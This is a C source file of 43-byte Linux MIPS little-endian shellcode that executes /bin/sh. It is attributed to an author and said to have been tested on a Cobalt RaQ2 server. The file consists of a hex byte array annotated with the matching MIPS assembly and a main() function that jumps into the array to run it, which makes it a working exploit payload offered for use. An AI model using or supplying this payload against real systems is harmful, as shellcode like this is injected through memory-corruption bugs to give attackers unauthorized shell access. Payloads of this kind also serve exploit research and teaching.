/* 43 bytes execve /bin/sh shellcode - linux-mips
 * - by bighawk (bighawk@kryptology.org)
 *
 * Note: For MIPS running in little-endian mode.
 * Tested on a Cobalt RaQ2 server running Linux 2.0.34
 */

char code[] =

/* setra: */	"\xff\xff\x10\x04"	// bltzal       zero, setra
		"\xab\x0f\x02\x24"	// or           v0, zero, 4011
		"\x41\x41\xff\x27"	// addiu        ra, ra, 0x4141
		"\xdb\xbe\xe4\x27"	// addiu        a0, ra, -0x4125
		"\xe3\xbe\xe5\x27"	// addiu        a1, ra  -0x411d
		"\xe3\xbe\xe4\xaf"	// sw           a0, -0x411d(ra)
		"\xe7\xbe\xe0\xaf"	// sw           zero, -0x4119(ra)
		"\xe2\xbe\xe0\xa3"	// sb           zero, -0x411e(ra)
		"\xcc\x48\x49\x03"	// syscall
                "/bin/sh";

main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}